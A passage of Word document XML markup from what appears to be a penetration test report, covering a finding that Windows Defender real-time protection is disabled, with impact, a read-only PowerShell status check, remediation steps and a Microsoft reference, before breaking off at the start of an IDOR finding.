              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="4A1B8DD9">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72EA9AB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C1AE371" w14:textId="5641C846">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9399571" w14:textId="74EB134F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCap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0D49241"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E225222"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3E710C2E">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49776F" w14:textId="448507F9">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w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.0</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">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528FAC0" w:rsidP="0D325B6E" w:rsidRDefault="4528FAC0" w14:paraId="267A551C" w14:textId="24AB0191">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="4528FAC0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="244CB62A">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413BF3" w14:textId="45550403">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCap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CAC781E" w14:textId="29C7E13B">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45934F3" w:rsidP="0D325B6E" w:rsidRDefault="545934F3" w14:paraId="386B9DCD" w14:textId="611AAEA4">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rfd5d42d7b21e49ab">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="545934F3">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1562.001</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="239D0DFA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:Impair Defenses -</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="545934F3">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Disable or Modify Tools</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="76E2DBD7">
        <w:trPr>
          <w:trHeight w:val="956"/>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A37375F"/>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ABD7C93" w14:textId="6C1209EF">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BAC13D5" w:rsidP="0D325B6E" w:rsidRDefault="5BAC13D5" w14:paraId="276D486C" w14:textId="7D158877">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rbb6511697108446e">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5BAC13D5">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1047: Audit</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="5BAC13D5" w:rsidP="0D325B6E" w:rsidRDefault="5BAC13D5" w14:paraId="590FF799" w14:textId="371CD335">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R107332733aca4ad0">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5BAC13D5">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1050: Exploit Protection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="399E33AF">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23DB2A" w14:textId="026F02B5">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>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0064EC2" w14:textId="67FA7075">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76E9541" w14:textId="0A2C614C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="34A17402" w:rsidP="0D325B6E" w:rsidRDefault="34A17402" w14:paraId="06F60E22" w14:textId="1F6ECE63">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4A17402" w:rsidP="0D325B6E" w:rsidRDefault="34A17402" w14:paraId="414BF324" w14:textId="1630EA4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34A17402">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 xml:space="preserve"> has </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0F5EDB31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Real-Time Protection and</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0F5EDB3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Windows Defender disable</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 xml:space="preserve">d. </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his removes the primary defense layer of the machine, leaving the system exposed to common attac</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5A2EF2AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="669DB210" w14:textId="7314FA90">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A17402" w:rsidP="0D325B6E" w:rsidRDefault="34A17402" w14:paraId="46758876" w14:textId="5018290D">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34A1740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31409F5" w:rsidP="0D325B6E" w:rsidRDefault="231409F5" w14:paraId="19E80742" w14:textId="4403ABA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31409F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An attacker can successfully compromise the machine with</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6819A8F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">out interference, alerting, or </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6819A8F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prevention</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6819A8F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an active Antivirus</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="231409F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which makes the machine an easy target for malware infection. A compromise can result in the theft of s</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5E206846">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ensitive data and allow attackers to launch further attacks against other systems within the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5C8E2FCC" w14:textId="31E88379">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4A17402" w:rsidP="0D325B6E" w:rsidRDefault="34A17402" w14:paraId="0C5C15C8" w14:textId="21C1B59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4A17402" w:rsidP="0D325B6E" w:rsidRDefault="34A17402" w14:paraId="4CA2DB30" w14:textId="7E97D28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Step 1: Log into the affected Windows machine with a user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34A17402" w:rsidP="0D325B6E" w:rsidRDefault="34A17402" w14:paraId="2EE18DE4" w14:textId="03BA0DE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251351CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open PowerShell and run ‘Get-</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="251351CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MPComputerStatus</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="251351CE">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251351CE">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251351CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the RealTimeProtectionEnabled option is set to ‘false’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="489A84FD" w14:textId="7694478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34A17402" w:rsidP="0D325B6E" w:rsidRDefault="34A17402" w14:paraId="6677FC5B" w14:textId="0F248F71">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4A17402" w:rsidP="0D325B6E" w:rsidRDefault="34A17402" w14:paraId="0A92E01F" w14:textId="1FB84A2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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34A17402" w:rsidP="0D325B6E" w:rsidRDefault="34A17402" w14:paraId="015464D4" w14:textId="348F985A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>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Enab</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34A17402">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">le </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Win</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dows Def</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ender and e</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 xml:space="preserve">nsure </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that 'Real-ti</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me pro</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tection</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 xml:space="preserve"> ‘Cloud-delivered protection</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9BC5DD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ‘Tamper protection’ are enabled on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4CBABFC8" w:rsidP="0D325B6E" w:rsidRDefault="4CBABFC8" w14:paraId="54D81459" w14:textId="5A513305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>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CBABFC8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set the correct Windows Defender settings via Group Policy Objects (GPO) to enforce it across a domain environment, preventing users from disabling it and ensuring a consistent security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3EC6338F" w14:textId="71EDCAE7">
      <w:pPr>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34A17402" w:rsidP="0D325B6E" w:rsidRDefault="34A17402" w14:paraId="01A4E4D0" w14:textId="6808EDB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A17402">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307CE16" w:rsidP="0D325B6E" w:rsidRDefault="1307CE16" w14:paraId="4BB5988B" w14:textId="04AE30B9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R0972a65a9d27449f">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1307CE16">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Microsoft - Microsoft Defender Antivirus in the Windows Security App</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="50F8A0A3" w14:textId="00F18D2C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C603E03" w:rsidP="0D325B6E" w:rsidRDefault="5C603E03" w14:paraId="751AFC41" w14:textId="48EB3866">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2025832777" w:id="1725386412"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C603E03">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C603E03">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc2003752583" w:id="244792397"/>
      <w:bookmarkStart w:name="_Toc655052660" w:id="19523665"/>
      <w:bookmarkStart w:name="_Toc1778411894" w:id="1383449432"/>
      <w:bookmarkStart w:name="_Toc343745090" w:id="411702221"/>
      <w:bookmarkStart w:name="_Toc2028318808" w:id="954295817"/>
      <w:bookmarkStart w:name="_Toc1025950504" w:id="1977002862"/>
      <w:bookmarkStart w:name="_Toc1915432539" w:id="29258044"/>
      <w:bookmarkStart w:name="_Toc1239628041" w:id="2034660696"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="22B3E09F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Insecure Direct Object Reference</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="09311489">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (IDOR)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="244792397"/>
      <w:bookmarkEnd w:id="19523665"/>
      <w:bookmarkEnd w:id="1383449432"/>
      <w:bookmarkEnd w:id="411702221"/>
      <w:bookmarkEnd w:id="954295817"/>
      <w:bookmarkEnd w:id="1977002862"/>
      <w:bookmarkEnd w:id="29258044"/>
      <w:bookmarkEnd w:id="2034660696"/>
      <w:bookmarkEnd w:id="1725386412"/>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157045B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334DC7" w14:textId="58EF6E4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F62F7F" w14:textId="0FCA096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800CC4B" w14:textId="0AA3D00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333D86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9CA701" w14:textId="0466531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5E074E7" w:rsidP="0D325B6E" w:rsidRDefault="45E074E7" w14:paraId="4E927208" w14:textId="191C7ED1">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45E074E7">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44597E7" w:rsidP="0D325B6E" w:rsidRDefault="744597E7" w14:paraId="03E63649" w14:textId="21A76897">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="744597E7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="45E074E7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
